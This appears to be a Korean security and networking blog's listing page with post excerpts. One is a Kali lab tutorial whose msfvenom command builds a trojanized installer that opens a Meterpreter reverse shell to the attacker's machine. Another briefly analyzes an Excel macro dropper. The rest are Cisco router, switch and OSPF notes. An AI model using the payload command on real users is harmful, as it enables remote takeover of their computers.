분류 전체보기30 [Kali Linux] 설치 파일을 위변조하여 사용자 권한 탈취 (Reverse Shell) msfvenom를 활용하여 사용자의 권한을 탈취할 수 있는 악성파일을 만든다 사용자가 변조된 파일을 실행하게 되면 사용자의 PC에서 공격자의 칼리로 Reverse Shell을 시도한다. ( Kali ) 10.211.55.13에서 ( Windows10 ) 10.211.55.19 같은 대역에 있는 PC를 대상으로 공격을 진행한다. # msfvenom -l payloads | grep "reverse" 타깃의 PC 환경이 Windows 10 , 리버스 공격을 진행할 것이므로 해당 항목이 포함된 페이로드를 선택한다. # msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.13 lport=4403 -f exe -o /home/parallels/Desktop/.. 2021. 5. 21. [Report] 악성 매크로를 포함한 액셀파일 분석 사용자는 이메일에 첨부된 이메일을 열람 후 액셀 파일을 다운로드하였다. 액셀파일에는 드로퍼성 매크로를 포함하고 있다. 매크로가 실행되면 사용자의 PC는 CnC서버로부터 추가적인 파일을 요청한다. 매크로를 실행한 이후 사용자의 PC는 Presentation.dll 라이브러리 파일을 요청하였다. 해당 파일에서 MZ~PE 시그니처를 확인 할 수 있다. 바이러스 토탈 사이트로 해당 DLL파일을 확인한 결과 다수의 엔진들이 Trojan 파일로 확인하였다. IDA로 확인한 결과 FindFirstChangeNotificationW 윈도우 함수 확인이 가능하다. 해당 함수는 지정된 디렉터리 또는 하위 트리에서 필터 조건과 일치하는 변경의 발생 여부를 확인하는 함수이다 사용자가 열람한 메일에서부터 액셀파일을 다운로드 하.. 2021. 5. 16. 네트워크관리사 실기 - 라우터 문제 참고 자료 네트워크 관리사 실기는 케이블링 + 에뮬레이터 활용 + 리눅스 + 단답형 + 라우터 문제로 구성되어 있다. 라우터 설정 문제는 총 3문제가 출제되며 배점은 각 5.5점으로 높은 비중을 차지하고 있다. 본 참고자료는 라우터에 초점을 둔 참고자료이다. " 문제 출제 비중은 라우터 기본 명령어를 활용한 문제들이 나온다. 난이도를 조금 높힌다 함은 rip 경로 설정 및 ospf 문제 유형까지 출제될 수 있다. 필자가 시험칠당시 ip 주소 할당 및 rip 문제가 출제되었다. " https://kyundev.tistory.com/25 [Network] Cisco Router 기본 명령어 정리 사용 가능 명령어 조회 "?"를 사용하면 해당 모드에서 사용 가능한 명령어 혹은 명령어가 잘 기억나지 않더라도 명령어를 찾을.. 2021. 1. 29. [Network] Cisco Switch 개념 및 기본 설정 스위치란? 수신한 프레임을 목적지 mac주소를 이용하여 연결된 포트로 프레임을 전송하는 장치입니다. 허브와 차이점? - 허브는 전기적인 신호를 증폭시켜 전송거리를 연장시키는 장치 입니다. - 허브는 데이터 프레임을 허브와 연결된 모든 장비에 다 플러딩(flooding) 합니다. - 플러딩(flooding) 특성 때문에 충돌이 생기기도 하며 보안상 문제가 생깁니다. 이더넷 스위치 종류 1. 단독형 스위치 : 포트 수가 고정되어있어서 포트 수 만큼만 연결이 가능한 스위치이다. 2. 스택형 스위치 : 여러 대의 스위치를 한대처럼 동작이 가능하도록 케이블을 이용하여 연결되어 있는 형태이다. 3. 모듈형 스위치 : 스위치 기능을 넘어서 다양한 기능을 추가할 수 있으며 여러 종류의 모듈을 선택하여 장착한 형태이다... 2021. 1. 29. [Network] Cisco Router - Ospf 1. OSPF 란? Ospf는 관리자가 정적으로 라우터의 경로를 입력하지 않아도 패킷이 알아서 길을 찾아가는 Dynamic Routing Protocol의 방식 중 한 방법으로 대규모 네트워크에서 적합한 형태를 가집니다. 2. OSPF 특징 - Hop 의 개수 제한이 없습니다. 따라서 대규모 네트워크에서 적합한 형태를 띠고 있습니다. - VLSM를 지원하여 ip 주소 할당에서 효과적으로 사용할 수 있다. - OSPF는 로드 벨런싱을 개선합니다. - 라우팅 정보를 변화가 있을때 마다 부분 갱신하여 낭비되는 트래픽을 줄였습니다. - 라우터를 영역( Area ) 으로 나눌 수 있습니다. 영역을 지정한 뒤 네트워크를 세분화하여 관리를 하기 때문에 효율적인 관리가 가능하다. - 멀티캐스트를 사용하여 정보를 전달한.. 2021. 1. 25. [Network] Cisco Router Debug Router Debug 란? 디버그는 show 명령어와 유사한 명령어입니다. show 명령어가 단편의 일부를 보여 주는 것이라면 debug는 실시간으로 동작 상황을 보여줍니다. 하지만 debug 명령어를 사용할 시 신중하게 사용해야 합니다. 해당 방법은 라우터에 부하를 많이 주기 때문에 특정한 활동에 한해서 디버깅해야 합니다. IP Packet Debugging 디버깅을 활성화하는 방법은 간단하다. 라우터 관리자 모드에서 해당 명령어 입력으로 활성화된다. R1 # debug ip packet 활성화시 packet debugging is on 메시지를 확인 할 수 있다 IP Packet Debugging 중지 라우터 관리자 모드에서 해당 명령어를 입력함으로써 특정 디버깅을 중지한다 모든 디버깅을 중지하는 .. 2021. 1. 21. 이전 1 2 3 4 5 다음
